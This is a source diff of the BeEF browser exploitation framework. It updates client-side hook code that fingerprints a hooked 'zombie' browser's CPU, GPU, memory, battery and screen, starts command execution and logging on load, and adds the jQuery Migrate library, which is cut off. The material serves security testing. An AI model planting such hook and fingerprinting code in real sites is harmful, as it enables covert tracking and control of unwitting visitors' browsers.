
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/json.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/geolocation.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/hardware.js

@@ -1,129 +1,298 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 beef.hardware = {
 
-	ua: navigator.userAgent,
+  ua: navigator.userAgent,
 
-	cpuType: function() {
-		// IE
-		if (typeof navigator.cpuClass != 'undefined') {
-			cpu = navigator.cpuClass;
-			if (cpu == "x86")   return "32-bit";
-			if (cpu == "68K")   return "Motorola 68K";
-			if (cpu == "PPC")   return "Motorola PPC";
-			if (cpu == "Alpha") return "Digital";
-			if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
-			if (this.ua.match('Win64; x64'))  return "64-bit (AMD)";
-		// Firefox
-        } else if (typeof navigator.oscpu != 'undefined') {
-			if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
-		}
-		if (navigator.platform.toLowerCase() == "win64") return "64-bit";
-		return "32-bit";
-	},
+  /*
+   * @return: {String} CPU type
+   **/
+  getCpuArch: function() {
+    var arch = 'UNKNOWN';
+    // note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
+    // in detecting the OS arch rather than the browser build
+    if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
+      arch = 'x86_64';
+    }else if(typeof navigator.cpuClass != 'undefined'){
+      switch (navigator.cpuClass) {
+        case '68K':
+          arch = 'Motorola 68K';
+          break;
+        case 'PPC':
+          arch = 'Motorola PPC';
+          break;
+        case 'Digital':
+          arch = 'Alpha';
+          break;
+        default:
+          arch = 'x86';
+      }
+    }
+    // TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
+    // For example, if OSX is at least 10.7, most certainly is 64 bit.
+    return arch;
+  },
 
-	isTouchEnabled: function() {
-		if ('ontouchstart' in document) return true;
-		return false;
-	},
+  /**
+   * Returns number of CPU cores
+   **/
+  getCpuCores: function() {
+    var cores = 'unknown';
+    try {
+      if(typeof navigator.hardwareConcurrency != 'undefined') {
+        cores = navigator.hardwareConcurrency;
+      }
+    } catch(e) {
+      cores = 'unknown';
+    }
+    return cores;
+  },
 
-	isVirtualMachine: function() {
-		if (screen.width % 2 || screen.height % 2) return true;
-		return false;
-	},
+  /**
+   * Returns CPU details
+   **/
+  getCpuDetails: function() {
+    return {
+      arch: beef.hardware.getCpuArch(),
+      cores: beef.hardware.getCpuCores()
+    }
+  },
 
-	isLaptop: function() {
-		// Most common laptop screen resolution
-		if (screen.width == 1366 && screen.height == 768) return true;
-		// Netbooks
-		if (screen.width == 1024 && screen.height == 600) return true;
-		return false;
-	},
+  /**
+   * Returns GPU details
+   **/
+  getGpuDetails: function() {
+    var gpu = 'unknown';
+    var vendor = 'unknown';
+    // use canvas technique:
+    // https://github.com/Valve/fingerprintjs2
+    // http://codeflow.org/entries/2016/feb/10/webgl_debug_renderer_info-extension-survey-results/
+    try {
+      var getWebglCanvas = function () {
+        var canvas = document.createElement('canvas')
+        var gl = null
+        try {
+          gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl')
+        } catch (e) { }
+        if (!gl) { gl = null }
+        return gl;
+      }
 
-	isNokia: function() {
-		return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
-	},
+      var glContext = getWebglCanvas();
+      var extensionDebugRendererInfo = glContext.getExtension('WEBGL_debug_renderer_info');
+      var gpu = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_RENDERER_WEBGL);
+      var vendor = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_VENDOR_WEBGL);
+      beef.debug("GPU: " + gpu + " - Vendor: " + vendor);
+    } catch (e) {
+      beef.debug('Failed to detect WebGL renderer: ' + e.toString());
+    }
+    return {
+      gpu: gpu,
+      vendor: vendor
+    }
+  },
 
-	isZune: function() {
-		return (this.ua.match('ZuneWP7')) ? true : false;
-	},
+  /**
+   * Returns RAM (GiB)
+   **/
+  getMemory: function() {
+    var memory = 'unknown';
+    try {
+      if(typeof navigator.deviceMemory != 'undefined') {
+        memory = navigator.deviceMemory;
+      }
+    } catch(e) {
+      memory = 'unknown';
+    }
+    return memory;
+  },
 
-	isHtc: function() {
-		return (this.ua.match('HTC')) ? true : false;
-	},
+  /**
+   * Returns battery details
+   **/
+  getBatteryDetails: function() {
+    var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
 
-	isEricsson: function() {
-		return (this.ua.match('Ericsson')) ? true : false;
-	},
+    if (!!battery) {
+      return {
+        chargingStatus: battery.charging,
+        batteryLevel: battery.level * 100 + "%",
+        chargingTime: battery.chargingTime,
+        dischargingTime: battery.dischargingTime
+      }
+    } else {
+      return {
+        chargingStatus: 'unknown',
+        batteryLevel: 'unknown',
+        chargingTime: 'unknown',
+        dischargingTime: 'unknown'
+      }
+    }
+  },
 
-	isMotorola: function() {
-		return (this.ua.match('Motorola')) ? true : false;
-	},
+  /**
+   * Returns zombie screen size and color depth.
+   */
+  getScreenSize: function () {
+    return {
+      width: window.screen.width,
+      height: window.screen.height,
+      colordepth: window.screen.colorDepth
+    }
+  },
 
-	isGoogle: function() {
-		return (this.ua.match('Nexus One')) ? true : false;
-	},
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isTouchEnabled: function() {
+    if ('ontouchstart' in document) return true;
+    return false;
+  },
 
-        /**
-         * Returns true if the browser is on a Mobile Phone
-         * @return: {Boolean} true or false
-         *
-         * @example: if(beef.hardware.isMobilePhone()) { ... }
-         **/
-        isMobilePhone: function() {
-            return DetectMobileQuick();
-        },
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isVirtualMachine: function() {
+    if (this.getGpuDetails().vendor.match('VMware, Inc'))
+      return true;
 
-	getName: function() {
-                var ua = navigator.userAgent.toLowerCase();
-                if(DetectIphone())              { return "iPhone"};
-                if(DetectIpod())                { return "iPod Touch"};
-                if(DetectIpad())                { return "iPad"};
-		if (this.isHtc())               { return 'HTC'};
-		if (this.isMotorola())          { return 'Motorola'};
-		if (this.isZune())              { return 'Zune'};
-		if (this.isGoogle())            { return 'Google Nexus One'};
-		if (this.isEricsson())          { return 'Ericsson'};
-                if(DetectAndroidPhone())        { return "Android Phone"};
-                if(DetectAndroidTablet())       { return "Android Tablet"};
-                if(DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
-                if(ua.search(deviceS60) > -1)   { return "Nokia S60"};
-                if(ua.search(deviceS70) > -1)   { return "Nokia S70"};
-                if(ua.search(deviceS80) > -1)   { return "Nokia S80"};
-                if(ua.search(deviceS90) > -1)   { return "Nokia S90"};
-                if(ua.search(deviceSymbian) > -1)   { return "Nokia Symbian"};
-		if (this.isNokia())             { return 'Nokia'};
-                if(DetectWindowsPhone7())       { return "Windows Phone 7"};
-                if(DetectWindowsMobile())       { return "Windows Mobile"};
-                if(DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
-                if(DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
-                if(DetectBlackBerryTouch())     { return "BlackBerry Touch"};
-                if(DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
-                if(DetectBlackBerry())          { return "BlackBerry"};
-                if(DetectPalmOS())              { return "Palm OS"};
-                if(DetectPalmWebOS())           { return "Palm Web OS"};
-                if(DetectGarminNuvifone())      { return "Gamin Nuvifone"};
-                if(DetectArchos())              { return "Archos"}
-                if(DetectBrewDevice())          { return "Brew"};
-                if(DetectDangerHiptop())        { return "Danger Hiptop"};
-                if(DetectMaemoTablet())         { return "Maemo Tablet"};
-                if(DetectSonyMylo())            { return "Sony Mylo"};
-                if(DetectAmazonSilk())          { return "Kindle Fire"};
-                if(DetectKindle())              { return "Kindle"};
-                if(DetectSonyPlaystation())                 { return "Playstation"};
-                if(ua.search(deviceNintendoDs) > -1)        { return "Nintendo DS"};
-                if(ua.search(deviceWii) > -1)               { return "Nintendo Wii"};
-                if(ua.search(deviceNintendo) > -1)          { return "Nintendo"};
-                if(DetectXbox())                            { return "Xbox"};
-				if(this.isLaptop())							{ return "Laptop"};
-                if(this.isVirtualMachine())                 { return "Virtual Machine"};
+    if (this.isMobileDevice())
+      return false;
 
-		return 'Unknown';
-	}
+    // if the screen resolution is uneven, and it's not a known mobile device
+    // then it's probably a VM
+    if (screen.width % 2 || screen.height % 2)
+      return true;
+
+    return false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isLaptop: function() {
+    if (this.isMobileDevice()) return false;
+    // Most common laptop screen resolution
+    if (screen.width == 1366 && screen.height == 768) return true;
+    // Netbooks
+    if (screen.width == 1024 && screen.height == 600) return true;
+    return false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isNokia: function() {
+    return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)|(Lumia )')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isZune: function() {
+    return (this.ua.match('ZuneWP7')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isHtc: function() {
+    return (this.ua.match('HTC')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isEricsson: function() {
+    return (this.ua.match('Ericsson')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isMotorola: function() {
+    return (this.ua.match('Motorola')) ? true : false;
+  },
+
+  /*
+   * @return: {Boolean} true or false.
+   **/
+  isGoogle: function() {
+    return (this.ua.match('Nexus One')) ? true : false;
+  },
+
+  /**
+   * Returns true if the browser is on a Mobile device
+   * @return: {Boolean} true or false
+   *
+   * @example: if(beef.hardware.isMobileDevice()) { ... }
+   **/
+  isMobileDevice: function() {
+    return MobileEsp.DetectMobileQuick();
+  },
+
+  /**
+   * Returns true if the browser is on a game console
+   * @return: {Boolean} true or false
+   *
+   * @example: if(beef.hardware.isGameConsole()) { ... }
+   **/
+  isGameConsole: function() {
+    return MobileEsp.DetectGameConsole();
+  },
+
+  getName: function() {
+    var ua = navigator.userAgent.toLowerCase();
+    if(MobileEsp.DetectIphone())              { return "iPhone"};
+    if(MobileEsp.DetectIpod())                { return "iPod Touch"};
+    if(MobileEsp.DetectIpad())                { return "iPad"};
+    if (this.isHtc())               { return 'HTC'};
+    if (this.isMotorola())          { return 'Motorola'};
+    if (this.isZune())              { return 'Zune'};
+    if (this.isGoogle())            { return 'Google Nexus One'};
+    if (this.isEricsson())          { return 'Ericsson'};
+    if(MobileEsp.DetectAndroidPhone())        { return "Android Phone"};
+    if(MobileEsp.DetectAndroidTablet())       { return "Android Tablet"};
+    if(MobileEsp.DetectS60OssBrowser())       { return "Nokia S60 Open Source"};
+    if(ua.search(MobileEsp.deviceS60) > -1)   { return "Nokia S60"};
+    if(ua.search(MobileEsp.deviceS70) > -1)   { return "Nokia S70"};
+    if(ua.search(MobileEsp.deviceS80) > -1)   { return "Nokia S80"};
+    if(ua.search(MobileEsp.deviceS90) > -1)   { return "Nokia S90"};
+    if(ua.search(MobileEsp.deviceSymbian) > -1)   { return "Nokia Symbian"};
+    if (this.isNokia())             { return 'Nokia'};
+    if(MobileEsp.DetectWindowsPhone7())       { return "Windows Phone 7"};
+    if(MobileEsp.DetectWindowsPhone8())       { return "Windows Phone 8"};
+    if(MobileEsp.DetectWindowsPhone10())      { return "Windows Phone 10"};
+    if(MobileEsp.DetectWindowsMobile())       { return "Windows Mobile"};
+    if(MobileEsp.DetectBlackBerryTablet())    { return "BlackBerry Tablet"};
+    if(MobileEsp.DetectBlackBerryWebKit())    { return "BlackBerry OS 6"};
+    if(MobileEsp.DetectBlackBerryTouch())     { return "BlackBerry Touch"};
+    if(MobileEsp.DetectBlackBerryHigh())      { return "BlackBerry OS 5"};
+    if(MobileEsp.DetectBlackBerry())          { return "BlackBerry"};
+    if(MobileEsp.DetectPalmOS())              { return "Palm OS"};
+    if(MobileEsp.DetectPalmWebOS())           { return "Palm Web OS"};
+    if(MobileEsp.DetectGarminNuvifone())      { return "Gamin Nuvifone"};
+    if(MobileEsp.DetectArchos())              { return "Archos"}
+    if(MobileEsp.DetectBrewDevice())          { return "Brew"};
+    if(MobileEsp.DetectDangerHiptop())        { return "Danger Hiptop"};
+    if(MobileEsp.DetectMaemoTablet())         { return "Maemo Tablet"};
+    if(MobileEsp.DetectSonyMylo())            { return "Sony Mylo"};
+    if(MobileEsp.DetectAmazonSilk())          { return "Kindle Fire"};
+    if(MobileEsp.DetectKindle())              { return "Kindle"};
+    if(MobileEsp.DetectSonyPlaystation())                 { return "Playstation"};
+    if(ua.search(MobileEsp.deviceNintendoDs) > -1)        { return "Nintendo DS"};
+    if(ua.search(MobileEsp.deviceWii) > -1)               { return "Nintendo Wii"};
+    if(ua.search(MobileEsp.deviceNintendo) > -1)          { return "Nintendo"};
+    if(MobileEsp.DetectXbox())                            { return "Xbox"};
+    if(this.isLaptop())                         { return "Laptop"};
+    if(this.isVirtualMachine())                 { return "Virtual Machine"};
+
+    return 'Unknown';
+  }
 };
 
 beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -64,18 +64,19 @@ window.onclose = function (event) {
 function beef_init() {
     if (!beef.pageIsLoaded) {
         beef.pageIsLoaded = true;
+        beef.net.browser_details();
+
         if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
-            beef.websocket.start();
-            beef.net.browser_details();
-            beef.updater.execute_commands();
-            beef.logger.start();
-            beef.are.init();
+            setTimeout(function(){
+                beef.websocket.start();
+                beef.updater.execute_commands();
+                beef.logger.start();
+            }, parseInt(beef.websocket.ws_connect_timeout));
         }else {
             beef.net.browser_details();
             beef.updater.execute_commands();
             beef.updater.check();
             beef.logger.start();
-            beef.are.init();
         }
     }
 }

core/main/client/lib/deployJava.js

@@ -70,16 +70,10 @@ var deployJava = function() {
         hattrs.events);
     var applet_valid_attrs = hattrs.applet.concat(hattrs.core);
 
-    // generic log function, use console.log unless it isn't available
-    // then revert to alert()
+    // generic log function
     function log(message) {
         if ( ! rv.debug ) {return};
-
-        if (console.log) {
-            console.log(message);
-        } else {
-            alert(message);
-        }
+        beef.debug(message);
     }
 
     //checks where given version string matches query
@@ -1298,4 +1292,4 @@ var deployJava = function() {
     }
 
     return rv;
-}();
+}();

core/main/client/lib/evercookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/lib/jquery-migrate-1.4.1.js

@@ -0,0 +1,752 @@
+/*!
+ * jQuery Migrate - v1.4.1 - 2016-05-19
+ * Copyright jQuery Foundation and other contributors
+ */
+(function( jQuery, window, undefined ) {
+// See http://bugs.jquery.com/ticket/13335
+// "use strict";
+
+
+jQuery.migrateVersion = "1.4.1";
+
+
+var warnedAbout = {};
+
+// List of warnings already given; public read only
+jQuery.migrateWarnings = [];
+
+// Set to true to prevent console output; migrateWarnings still maintained
+// jQuery.migrateMute = false;
+
+// Show a message on the console so devs know we're active
+if ( window.console && window.console.log ) {
+	window.console.log( "JQMIGRATE: Migrate is installed" +
+		( jQuery.migrateMute ? "" : " with logging active" ) +
+		", version " + jQuery.migrateVersion );
+}
+
+// Set to false to disable traces that appear with warnings
+if ( jQuery.migrateTrace === undefined ) {
+	jQuery.migrateTrace = true;
+}
+
+// Forget any warnings we've already given; public
+jQuery.migrateReset = function() {
+	warnedAbout = {};
+	jQuery.migrateWarnings.length = 0;
+};
+
+function migrateWarn( msg) {
+	var console = window.console;
+	if ( !warnedAbout[ msg ] ) {
+		warnedAbout[ msg ] = true;
+		jQuery.migrateWarnings.push( msg );
+		if ( console && console.warn && !jQuery.migrateMute ) {
+			console.warn( "JQMIGRATE: " + msg );
+			if ( jQuery.migrateTrace && console.trace ) {
+				console.trace();
+			}
+		}
+	}
+}
+
+function migrateWarnProp( obj, prop, value, msg ) {
+	if ( Object.defineProperty ) {
+		// On ES5 browsers (non-oldIE), warn if the code tries to get prop;
+		// allow property to be overwritten in case some other plugin wants it
+		try {
+			Object.defineProperty( obj, prop, {
+				configurable: true,
+				enumerable: true,
+				get: function() {
+					migrateWarn( msg );
+					return value;
+				},
+				set: function( newValue ) {
+					migrateWarn( msg );
+					value = newValue;
+				}
+			});
+			return;
+		} catch( err ) {
+			// IE8 is a dope about Object.defineProperty, can't warn there
+		}
+	}
+
+	// Non-ES5 (or broken) browser; just set the property
+	jQuery._definePropertyBroken = true;
+	obj[ prop ] = value;
+}
+
+if ( document.compatMode === "BackCompat" ) {
+	// jQuery has never supported or tested Quirks Mode
+	migrateWarn( "jQuery is not compatible with Quirks Mode" );
+}
+
+
+var attrFn = jQuery( "<input/>", { size: 1 } ).attr("size") && jQuery.attrFn,
+	oldAttr = jQuery.attr,
+	valueAttrGet = jQuery.attrHooks.value && jQuery.attrHooks.value.get ||
+		function() { return null; },
+	valueAttrSet = jQuery.attrHooks.value && jQuery.attrHooks.value.set ||
+		function() { return undefined; },
+	rnoType = /^(?:input|button)$/i,
+	rnoAttrNodeType = /^[238]$/,
+	rboolean = /^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,
+	ruseDefault = /^(?:checked|selected)$/i;
+
+// jQuery.attrFn
+migrateWarnProp( jQuery, "attrFn", attrFn || {}, "jQuery.attrFn is deprecated" );
+
+jQuery.attr = function( elem, name, value, pass ) {
+	var lowerName = name.toLowerCase(),
+		nType = elem && elem.nodeType;
+
+	if ( pass ) {
+		// Since pass is used internally, we only warn for new jQuery
+		// versions where there isn't a pass arg in the formal params
+		if ( oldAttr.length < 4 ) {
+			migrateWarn("jQuery.fn.attr( props, pass ) is deprecated");
+		}
+		if ( elem && !rnoAttrNodeType.test( nType ) &&
+			(attrFn ? name in attrFn : jQuery.isFunction(jQuery.fn[name])) ) {
+			return jQuery( elem )[ name ]( value );
+		}
+	}
+
+	// Warn if user tries to set `type`, since it breaks on IE 6/7/8; by checking
+	// for disconnected elements we don't warn on $( "<button>", { type: "button" } ).
+	if ( name === "type" && value !== undefined && rnoType.test( elem.nodeName ) && elem.parentNode ) {
+		migrateWarn("Can't change the 'type' of an input or button in IE 6/7/8");
+	}
+
+	// Restore boolHook for boolean property/attribute synchronization
+	if ( !jQuery.attrHooks[ lowerName ] && rboolean.test( lowerName ) ) {
+		jQuery.attrHooks[ lowerName ] = {
+			get: function( elem, name ) {
+				// Align boolean attributes with corresponding properties
+				// Fall back to attribute presence where some booleans are not supported
+				var attrNode,
+					property = jQuery.prop( elem, name );
+				return property === true || typeof property !== "boolean" &&
+					( attrNode = elem.getAttributeNode(name) ) && attrNode.nodeValue !== false ?
+
+					name.toLowerCase() :
+					undefined;
+			},
+			set: function( elem, value, name ) {
+				var propName;
+				if ( value === false ) {
+					// Remove boolean attributes when set to false
+					jQuery.removeAttr( elem, name );
+				} else {
+					// value is true since we know at this point it's type boolean and not false
+					// Set boolean attributes to the same name and set the DOM property
+					propName = jQuery.propFix[ name ] || name;
+					if ( propName in elem ) {
+						// Only set the IDL specifically if it already exists on the element
+						elem[ propName ] = true;
+					}
+
+					elem.setAttribute( name, name.toLowerCase() );
+				}
+				return name;
+			}
+		};
+
+		// Warn only for attributes that can remain distinct from their properties post-1.9
+		if ( ruseDefault.test( lowerName ) ) {
+			migrateWarn( "jQuery.fn.attr('" + lowerName + "') might use property instead of attribute" );
+		}
+	}
+
+	return oldAttr.call( jQuery, elem, name, value );
+};
+
+// attrHooks: value
+jQuery.attrHooks.value = {
+	get: function( elem, name ) {
+		var nodeName = ( elem.nodeName || "" ).toLowerCase();
+		if ( nodeName === "button" ) {
+			return valueAttrGet.apply( this, arguments );
+		}
+		if ( nodeName !== "input" && nodeName !== "option" ) {
+			migrateWarn("jQuery.fn.attr('value') no longer gets properties");
+		}
+		return name in elem ?
+			elem.value :
+			null;
+	},
+	set: function( elem, value ) {
+		var nodeName = ( elem.nodeName || "" ).toLowerCase();
+		if ( nodeName === "button" ) {
+			return valueAttrSet.apply( this, arguments );
+		}
+		if ( nodeName !== "input" && nodeName !== "option" ) {
+			migrateWarn("jQuery.fn.attr('value', val) no longer sets properties");
+		}
+		// Does not return so that setAttribute is also used
+		elem.value = value;
+	}
+};
+
+
+var matched, browser,
+	oldInit = jQuery.fn.init,
+	oldFind = jQuery.find,
+	oldParseJSON = jQuery.parseJSON,
+	rspaceAngle = /^\s*</,
+	rattrHashTest = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/,
+	rattrHashGlob = /\[(\s*[-\w]+\s*)([~|^$*]?=)\s*([-\w#]*?#[-\w#]*)\s*\]/g,
+	// Note: XSS check is done below after string is trimmed
+	rquickExpr = /^([^<]*)(<[\w\W]+>)([^>]*)$/;
+
+// $(html) "looks like html" rule change
+jQuery.fn.init = function( selector, context, rootjQuery ) {
+	var match, ret;
+
+	if ( selector && typeof selector === "string" ) {
+		if ( !jQuery.isPlainObject( context ) &&
+				(match = rquickExpr.exec( jQuery.trim( selector ) )) && match[ 0 ] ) {
+
+			// This is an HTML string according to the "old" rules; is it still?
+			if ( !rspaceAngle.test( selector ) ) {
+				migrateWarn("$(html) HTML strings must start with '<' character");
+			}
+			if ( match[ 3 ] ) {
+				migrateWarn("$(html) HTML text after last tag is ignored");
+			}
+
+			// Consistently reject any HTML-like string starting with a hash (gh-9521)
+			// Note that this may break jQuery 1.6.x code that otherwise would work.
+			if ( match[ 0 ].charAt( 0 ) === "#" ) {
+				migrateWarn("HTML string cannot start with a '#' character");
+				jQuery.error("JQMIGRATE: Invalid selector string (XSS)");
+			}
+
+			// Now process using loose rules; let pre-1.8 play too
+			// Is this a jQuery context? parseHTML expects a DOM element (#178)
+			if ( context && context.context && context.context.nodeType ) {
+				context = context.context;
+			}
+
+			if ( jQuery.parseHTML ) {
+				return oldInit.call( this,
+						jQuery.parseHTML( match[ 2 ], context && context.ownerDocument ||
+							context || document, true ), context, rootjQuery );
+			}
+		}
+	}
+
+	ret = oldInit.apply( this, arguments );
+
+	// Fill in selector and context properties so .live() works
+	if ( selector && selector.selector !== undefined ) {
+		// A jQuery object, copy its properties
+		ret.selector = selector.selector;
+		ret.context = selector.context;
+
+	} else {
+		ret.selector = typeof selector === "string" ? selector : "";
+		if ( selector ) {
+			ret.context = selector.nodeType? selector : context || document;
+		}
+	}
+
+	return ret;
+};
+jQuery.fn.init.prototype = jQuery.fn;
+
+jQuery.find = function( selector ) {
+	var args = Array.prototype.slice.call( arguments );
+
+	// Support: PhantomJS 1.x
+	// String#match fails to match when used with a //g RegExp, only on some strings
+	if ( typeof selector === "string" && rattrHashTest.test( selector ) ) {
+
+		// The nonstandard and undocumented unquoted-hash was removed in jQuery 1.12.0
+		// First see if qS thinks it's a valid selector, if so avoid a false positive
+		try {
+			document.querySelector( selector );
+		} catch ( err1 ) {
+
+			// Didn't *look* valid to qSA, warn and try quoting what we think is the value
+			selector = selector.replace( rattrHashGlob, function( _, attr, op, value ) {
+				return "[" + attr + op + "\"" + value + "\"]";
+			} );
+
+			// If the regexp *may* have created an invalid selector, don't update it
+			// Note that there may be false alarms if selector uses jQuery extensions
+			try {
+				document.querySelector( selector );
+				migrateWarn( "Attribute selector with '#' must be quoted: " + args[ 0 ] );
+				args[ 0 ] = selector;
+			} catch ( err2 ) {
+				migrateWarn( "Attribute selector with '#' was not fixed: " + args[ 0 ] );
+			}
+		}
+	}
+
+	return oldFind.apply( this, args );
+};
+
+// Copy properties attached to original jQuery.find method (e.g. .attr, .isXML)
+var findProp;
+for ( findProp in oldFind ) {
+	if ( Object.prototype.hasOwnProperty.call( oldFind, findProp ) ) {
+		jQuery.find[ findProp ] = oldFind[ findProp ];
+	}
+}
+
+// Let $.parseJSON(falsy_value) return null
+jQuery.parseJSON = function( json ) {
+	if ( !json ) {
+		migrateWarn("jQuery.parseJSON requires a valid JSON string");
+		return null;
+	}
+	return oldParseJSON.apply( this, arguments );
+};
+
+jQuery.uaMatch = function( ua ) {
+	ua = ua.toLowerCase();
+
+	var match = /(chrome)[ \/]([\w.]+)/.exec( ua ) ||
+		/(webkit)[ \/]([\w.]+)/.exec( ua ) ||
+		/(opera)(?:.*version|)[ \/]([\w.]+)/.exec( ua ) ||
+		/(msie) ([\w.]+)/.exec( ua ) ||
+		ua.indexOf("compatible") < 0 && /(mozilla)(?:.*? rv:([\w.]+)|)/.exec( ua ) ||
+		[];
+
+	return {
+		browser: match[ 1 ] || "",
+		version: match[ 2 ] || "0"
+	};
+};
+
+// Don't clobber any existing jQuery.browser in case it's different
+if ( !jQuery.browser ) {
+	matched = jQuery.uaMatch( navigator.userAgent );
+	browser = {};
+
+	if ( matched.browser ) {
+		browser[ matched.browser ] = true;
+		browser.version = matched.version;
+	}
+
+	// Chrome is Webkit, but Webkit is also Safari.
+	if ( browser.chrome ) {
+		browser.webkit = true;
+	} else if ( browser.webkit ) {
+		browser.safari = true;
+	}
+
+	jQuery.browser = browser;
+}
+
+// Warn if the code tries to get jQuery.browser
+migrateWarnProp( jQuery, "browser", jQuery.browser, "jQuery.browser is deprecated" );
+
+// jQuery.boxModel deprecated in 1.3, jQuery.support.boxModel deprecated in 1.7
+jQuery.boxModel = jQuery.support.boxModel = (document.compatMode === "CSS1Compat");
+migrateWarnProp( jQuery, "boxModel", jQuery.boxModel, "jQuery.boxModel is deprecated" );
+migrateWarnProp( jQuery.support, "boxModel", jQuery.support.boxModel, "jQuery.support.boxModel is deprecated" );
+
+jQuery.sub = function() {
+	function jQuerySub( selector, context ) {
+		return new jQuerySub.fn.init( selector, context );
+	}
+	jQuery.extend( true, jQuerySub, this );
+	jQuerySub.superclass = this;
+	jQuerySub.fn = jQuerySub.prototype = this();
+	jQuerySub.fn.constructor = jQuerySub;
+	jQuerySub.sub = this.sub;
+	jQuerySub.fn.init = function init( selector, context ) {
+		var instance = jQuery.fn.init.call( this, selector, context, rootjQuerySub );
+		return instance instanceof jQuerySub ?
+			instance :
+			jQuerySub( instance );
+	};
+	jQuerySub.fn.init.prototype = jQuerySub.fn;
+	var rootjQuerySub = jQuerySub(document);
+	migrateWarn( "jQuery.sub() is deprecated" );
+	return jQuerySub;
+};
+
+// The number of elements contained in the matched element set
+jQuery.fn.size = function() {
+	migrateWarn( "jQuery.fn.size() is deprecated; use the .length property" );
+	return this.length;
+};
+
+
+var internalSwapCall = false;
+
+// If this version of jQuery has .swap(), don't false-alarm on internal uses
+if ( jQuery.swap ) {
+	jQuery.each( [ "height", "width", "reliableMarginRight" ], function( _, name ) {
+		var oldHook = jQuery.cssHooks[ name ] && jQuery.cssHooks[ name ].get;
+
+		if ( oldHook ) {
+			jQuery.cssHooks[ name ].get = function() {
+				var ret;
+
+				internalSwapCall = true;
+				ret = oldHook.apply( this, arguments );
+				internalSwapCall = false;
+				return ret;
+			};
+		}
+	});
+}
+
+jQuery.swap = function( elem, options, callback, args ) {
+	var ret, name,
+		old = {};
+
+	if ( !internalSwapCall ) {
+		migrateWarn( "jQuery.swap() is undocumented and deprecated" );
+	}
+
+	// Remember the old values, and insert the new ones
+	for ( name in options ) {
+		old[ name ] = elem.style[ name ];
+		elem.style[ name ] = options[ name ];
+	}
+
+	ret = callback.apply( elem, args || [] );
+
+	// Revert the old values
+	for ( name in options ) {
+		elem.style[ name ] = old[ name ];
+	}
+
+	return ret;
+};
+
+
+// Ensure that $.ajax gets the new parseJSON defined in core.js
+jQuery.ajaxSetup({
+	converters: {
+		"text json": jQuery.parseJSON
+	}
+});
+
+
+var oldFnData = jQuery.fn.data;
+
+jQuery.fn.data = function( name ) {
+	var ret, evt,
+		elem = this[0];
+
+	// Handles 1.7 which has this behavior and 1.8 which doesn't
+	if ( elem && name === "events" && arguments.length === 1 ) {
+		ret = jQuery.data( elem, name );
+		evt = jQuery._data( elem, name );
+		if ( ( ret === undefined || ret === evt ) && evt !== undefined ) {
+			migrateWarn("Use of jQuery.fn.data('events') is deprecated");
+			return evt;
+		}
+	}
+	return oldFnData.apply( this, arguments );
+};
+
+
+var rscriptType = /\/(java|ecma)script/i;
+
+// Since jQuery.clean is used internally on older versions, we only shim if it's missing
+if ( !jQuery.clean ) {
+	jQuery.clean = function( elems, context, fragment, scripts ) {
+		// Set context per 1.8 logic
+		context = context || document;
+		context = !context.nodeType && context[0] || context;
+		context = context.ownerDocument || context;
+
